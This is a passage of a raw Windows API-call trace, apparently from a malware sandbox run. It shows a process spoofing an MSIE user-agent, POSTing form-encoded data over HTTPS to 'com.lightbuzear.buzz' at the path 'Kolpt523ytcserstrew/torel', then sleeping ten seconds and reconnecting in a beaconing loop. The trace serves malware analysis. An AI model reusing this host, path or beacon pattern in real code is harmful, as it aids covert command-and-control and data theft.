0x4830de0 [0219.429] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0219.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0219.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0219.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0219.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0219.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb08 [0219.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0219.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb08 | out: hHeap=0x4780000) returned 1 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eaa8 [0219.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830bd8 [0219.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830bd8 | out: hHeap=0x4780000) returned 1 [0219.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0219.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a98 [0219.431] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0219.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c78 [0219.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0219.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0219.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0219.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0219.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0219.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0219.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0219.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0219.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0219.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0219.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0219.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb08 [0219.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0219.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0219.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb08 | out: hHeap=0x4780000) returned 1 [0219.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eaf0 [0219.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a48 [0219.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a48 | out: hHeap=0x4780000) returned 1 [0219.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0219.442] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0219.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0219.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0219.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0219.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0219.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0219.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0219.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0219.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0219.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0219.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebc8 [0219.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0219.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0219.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebc8 | out: hHeap=0x4780000) returned 1 [0219.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0219.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0219.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830db8 [0219.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0219.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0219.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0219.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830bd8 [0219.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0219.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0219.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0219.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0219.445] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0219.445] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0219.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0219.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0219.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0219.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0219.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0219.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0219.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0219.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb68 [0219.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0219.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb68 | out: hHeap=0x4780000) returned 1 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0219.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830db8 [0219.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0219.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a48 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0219.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b60 [0219.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0219.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0219.447] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0219.447] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0220.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b60 | out: hHeap=0x4780000) returned 1 [0220.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0220.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0220.568] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0220.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0220.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0220.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0220.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0220.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0220.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebb0 [0220.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb68 [0220.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0220.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb68 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830ae8 [0220.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0220.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ae8 | out: hHeap=0x4780000) returned 1 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e08 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0220.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0220.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0220.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0220.570] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0220.570] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0220.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0220.571] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0220.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0220.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0220.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0220.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0220.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0220.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0220.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0220.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0220.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0220.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb68 [0220.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0220.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0220.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb68 | out: hHeap=0x4780000) returned 1 [0220.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0220.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0220.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830e80 [0220.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0220.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0220.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0220.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c00 [0220.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0220.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ae8 [0220.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0220.573] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0220.573] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0220.612] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0220.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ae8 | out: hHeap=0x4780000) returned 1 [0220.613] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0220.613] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0220.613] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0220.613] FreeLibrary (hLibModule=0x71570000) returned 1 [0220.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0220.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0220.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c78 | out: hHeap=0x4780000) returned 1 [0220.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a98 | out: hHeap=0x4780000) returned 1 [0220.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0220.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d68 | out: hHeap=0x4780000) returned 1 [0220.615] Sleep (dwMilliseconds=0x2710) [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0220.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0220.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0220.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0220.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea90 [0220.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0220.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea90 | out: hHeap=0x4780000) returned 1 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0220.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ea90 [0220.666] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a98 [0220.675] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a98 | out: hHeap=0x4780000) returned 1 [0220.675] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0220.675] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c28 [0220.675] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0220.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0220.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0220.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0220.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb08 [0220.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb38 [0220.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb08 | out: hHeap=0x4780000) returned 1 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0220.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0220.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830cf0 [0220.677] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0220.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0220.677] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0220.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c78 [0220.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0220.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d68 [0220.677] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0220.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0220.678] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0220.678] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0220.678] FreeLibrary (hLibModule=0x71780000) returned 1 [0220.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d68 | out: hHeap=0x4780000) returned 1 [0220.679] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0220.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a98 [0220.679] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0220.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0220.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0220.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0220.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0220.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0220.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0220.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0220.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb08 [0220.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb38 [0220.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb08 | out: hHeap=0x4780000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0220.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ebc8 [0220.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0220.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0220.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0220.680] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d68 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 